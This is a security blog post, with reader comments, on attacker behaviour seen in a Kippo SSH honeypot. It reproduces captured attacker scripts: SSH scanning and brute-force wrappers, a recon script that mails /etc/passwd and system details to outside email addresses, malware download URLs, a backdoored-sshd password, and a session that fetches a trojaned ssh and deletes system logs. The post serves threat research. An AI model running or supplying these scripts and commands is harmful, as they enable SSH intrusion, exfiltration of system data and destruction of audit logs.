Kippo

I have been running Kippo for a couple of months now…

I will skip the configuration and setup since it has been covered extremely well by multiple blogs(I have included links at the bottom).

Back in the day(late mid-late 90s for me at least)  people were brute force ssh scanning guess what…they still are…

The majority of people scanning are using the same basic kit.  The brute forcing kits consist of a few variants of shell scripts used to launch the attack however the core components  pscan(written in the 90’s) and ssh brute force never change

Examples of shell scripts/pscan/ssh brute force

#!/bin/bash
#
# by lizard
#

if [ $# != 1 ]; then
echo ” usage: $0 <b class>”
exit;
fi

rm -rf scan.log

echo “# Scanãm $1 pe port 22”
echo -e “33[1;36m===    -=PaTroNu Private Scanner=-    ===”
echo -e “33[1;37m ==         #Private shit#            ==”
echo -e “33[1;36m  =      -Don’t share this!-          =”
echo
echo
sleep 1
././pscan2 $1 22
echo “–==: Hai sa vedem .. :==–”
./sshd 100
echo “Cam atat …hai, next”
sleep 10

 

#!/bin/bash
if [ $# != 1 ]; then
echo ” usage: $0 <b class>”
exit;
fi

…skipping one line
echo -e “33[1;31m«33[1;32m Created bY MaLa 33[1;31m»33[0m”
echo “INCERC SA DAU VIATZA CIBERNETICI”

./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo “# SA VEDEM CE PULA MEA FACEM”
echo “#          _ ____) _______”
echo “#         (_)[_bY_]{}<MaLa> ”
echo “#         /     )_/         ”
echo “#…….si DE root  ……. ”
echo ”                            ”
echo -e “Checking33[1;34m user file33[0m pass 1”
cp 1 pass_file
./ssh-scan 100
sleep 3
echo -e “Checking33[1;31m root file33[0m pass 2”
cp 2 pass_file
./ssh-scan 100
sleep 3
echo -e “Checking33[1;34m user file33[0m pass 3”
cp 3 pass_file
./ssh-scan 100
sleep 3
echo -e “Checking33[1;34m user file33[0m pass 4”
cp 4 pass_file
./ssh-scan 100
sleep 3
echo -e “Checking33[1;31m root file33[0m pass 5”
cp 5 pass_file
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo -e “33[1;31m«33[1;32mFuck .. continuam .. 33[1;31m»33[0m”

 

#!/bin/bash

echo “[+] [+] [+] RK [+] [+] [+]” >> info2
echo “[+] [+] [+] IP [+] [+] [+]” >> info2
/sbin/ifconfig -a >> info2
echo “[+] [+] [+] uptime [+] [+] [+]” >> info2
uptime >> info2
echo “[+] [+] [+] uname -a [+] [+] [+]” >> info2
uname -a >> info2
echo “[+] [+] [+] /etc/issue [+] [+] [+]” >> info2
cat /etc/issue >> info2
echo “[+] [+] [+] passwd [+] [+] [+]” >> info2
cat /etc/passwd >> info2
echo “[+] [+] [+] id [+] [+] [+]” >> info2
id >> info2
echo “[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]” >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s “Scanner MaLa Port : ?? | Pass : stii tu :))” cs.extrem@yaho
o.com
rm -rf info2
clear

echo “####################################################################”
echo “#                       ______                                  ”
echo “#                            .-.      .-.                               ”
echo “#                           /                                          ”
echo “#                          |     zRR      |                             ”
echo “#                          |,  .-.  .-.  ,|                             “

echo “#                          | )(z_/  z_)( |                             ”
echo “#                          |/     /     |                             ”
echo “#                  _       (_     ^^     _)                             ”
echo “#          _ ____) _________|IIIIII|__/_________________________     ”
echo “#         (_)[___]{}<________|-IIIIII/-|__zRR__zRR__zRR___________    ”
echo “#           /     )_/                  /                               ”
echo “#                             ______ /

echo “#                         SCANER PRIVAT                             ”
echo “#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               ”
echo “#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              ”
echo “####################################################################”

if [ -f a ]; then
cat vuln.txt |mail -s “Lame Gang Us Roots” mafia89tm@yahoo.com
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s “Lame Gang Us Roots” cs.extrem@yahoo.com
./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.245
./a $1.246
./a $1.247
./a $1.248
./a $1.249
cat vuln.txt |mail -s “Lame Gang Us Roots” cs.extrem@yahoo.com
./a $1.250
./a $1.251
./a $1.252
./a $1.253
./a $1.254
./a $1.255
killall -9 a
else
echo # Ciudat ..Nu Ai Urmat Instructiunile  #
echo # trebui dat mv assh a sau mv scan a   #
echo # orice ai avea tu … dohh ..         #
killall -9 a
killall -9 pscan2
fi

 

 

** pscan.c – Originally by Volatile
** modified by riksta, lizard

Usage: ./pscan2 [c-block]

 

SSH bruteforcer
– by lizard
Usage:
./sshd

 

Whats next?

After access it gained the 99% of them return and manually try to to install a couple different IRC bots(Engery Mech, Eggdrop) or PsyBNC.  I have also seen UDP.pl show up a couple of times it’s an extremely simple perl based UDP flooder.

No attempts to install any real backdoor or clean up logs after themselves.

A few examples of files that were uploaded.

http://managers.at.ua/piata.tgz.gz
http://tengere.webs.com/bnc/bnc.tgz
http://tengere.webs.com/bnc/psy.tgz
http://tengere.webs.com/bnc/eggdrop.tgz
http://www.vinica.net.mk/irc/emech/e.tar.gz
http://www.tradelinux.org/flood/udp.tgz
http://dh.at.ua/scan.tgz
http://undernet-staff.webs.com/ivan.tar.gz
http://dh.at.ua/scan.tgz
http://www.vinica.net.mk/irc/emech/e.tar.gz

1%  of attackers did attempt to install some sort of persistent backdoor and cover their tracks.

The example below is a backdoored version of ssh

http://dh.at.ua/ssh.tar

backdoor.h
#define BACKDOORPASSWD          “leadrouter”
#define LOGGING_PASSWORDS 1
#define PASSWORDS_LOG_FILE “/usr/include/gpm2.h”
int backdoor_active;

However after the person couldn’t get this running properly because of kippo blocking it he attempted to cut and run…hey at least he tried to clean the logs however the kill -9 -1 wouldn’t have been very subtle.

storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# kill -9 -1
storm:/root/ssh/ssh# vf /root
bash: vf: command not found
storm:/root/ssh/ssh# cd /root
storm:~# #!/bin/bash
bash: #!/bin/bash: command not found
storm:~# unset HISTFILE
storm:~# unset HISTSAVE
storm:~# history -n
1  uname -a
2  uname -a
3  cat /proc/cpuinfo
4  cat /etc/issue
5  cat /etc/issue
6  make test
7  yum
8  apt-get
9  apt-get install
10  apt-get install make
11  apt-get install openssh*
12  apt-get install openssl*
13  apt-get install make*
14  apt-get install mail*
15  wget dh.at.ua/ssh.tar
16  tar xvf ss
17  tar xvf ss h.tar
18  tar xvf ssh.tar
19  cd ssh
20  cd ssh
21  chmod -R 0700 *;./configure -prefix=/opt -sysconfdir=/etc/ssh;make;mv /etc/ssh/sshd_config /etc/ssh/sshd_backup;make install
22  kill -9 -1
23  kill -9 -1
24  kill -9 -1
25  kill -9 -1
26  kill -9 -1
27  vf /root
28  cd /root
29  #!/bin/bash
30  unset HISTFILE
31  unset HISTSAVE
32  history -n
storm:~# unset WATCH
storm:~# export HISTFILE=/dev/null
storm:~# rm -rf .bash_history
storm:~# rm -rf /var/run/utmp
storm:~# rm -rf /var/run/wtmp –
storm:~# rm -rf /var/log/lastlog
storm:~# rm -rf /usr/adm/lastlog
rm: cannot remove `/usr/adm/lastlog’: No such file or directory
storm:~# rm -rf .bash_history
storm:~# cd /var/log/
storm:/var/log# rm -rf wtmp
storm:/var/log# rm -rf secure
storm:/var/log# rm -rf lastlog
storm:/var/log# rm -rf messages
storm:/var/log# touch messagess
bash: touch: command not found
storm:/var/log# touch wtmp
bash: touch: command not found
storm:/var/log# touch secure
bash: touch: command not found
storm:/var/log# touch lastlog
bash: touch: command not found
storm:/var/log# cd /root
storm:~# rm -rf .bash_history
storm:~# touch .bash_history
bash: touch: command not found
storm:~# rm -rf /var/log/wtmp
storm:~# rm -rf /var/log/lastlog
storm:~# rm -rf /var/log/secure
storm:~# rm -rf /var/log/xferlog
storm:~# rm -rf /var/log/messages
storm:~# rm -rf /var/run/utmp
storm:~# touch /var/run/utmp
bash: touch: command not found
storm:~# touch /var/log/wtmp
bash: touch: command not found
storm:~# touch /var/log/xferlog
bash: touch: command not found
storm:~# touch /var/log/secure
bash: touch: command not found
storm:~# touch /var/log/lastlog
bash: touch: command not found
storm:~# rm -rf /var/log/maillog
storm:~# touch /var/log/maillog
bash: touch: command not found
storm:~# echo ”            * C O M P L E T E *”
* C O M P L E T E *
storm:~# echo “”
/
storm:~# sleep 2
bash: sleep: command not found
storm:~# echo ”            * Toate logurile au fost sterse- @Secret*”
* Toate logurile au fost sterse- @Secret*
storm:~# echo “”
/
storm:~# sleep 5
bash: sleep: command not found
storm:~# exit 1
Connection to server closed.

 

I will continue running kippo and work with the newly formed kippo user group finding better ways to track trends in passwords and software used.

A couple outside links to info on configuring and running kippo

Kippohttp://code.google.com/p/kippo/

Kippo user group – http://groups.google.com/group/kippousers

InfoSanitys Bloghttp://blog.infosanity.co.uk/

lvdeijk’s Bloghttp://lvdeijk.wordpress.com/

Posted in InfoSec
3 comments on “Kippo
  1. Ben says:

    My server got hacked with exactly what you described above (as in it had the same “by lizard” line) because I accidently left the postgres user open to ssh and had a simple password for that user. They then proceeded to run the brute force script to try and hack other servers, and like you say, didn’t even bother to cover their tracks.

    One thing I am interested in is why? What are they trying to do? I have seen files they left is this:

    handle		ciuvak
    mask		*!*@glamorous.users.undernet.org
    prot		4
    aop
    channel		*
    access		100
    
    handle		ciuvak
    mask		*!*@kodex.users.undernet.org
    prot		4
    aop
    channel		*
    
    handle		Kox
    mask		*!*@Kox.*
    prot		4
    aop
    channel		*
    access		100
    

    What does this mean?

    • justinelze says:

      That is a config for an energy mech IRC bot

      I would imagine they don’t try to cover their tracks because usually people who get hacked that way don’t have the skill set involved to check logs and see what actually happened.

      Also SSH brute forcing takes a very low skill level and these kids most likely don’t know how to install a proper root kit and cover their tracks.

  2. […] escalation vulnerability. From there it was clear that the backdoor installed in our backyard was a well-known SSH exploit harvesting SSH passwords and periodically sending the harvested crop to an external IP. […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: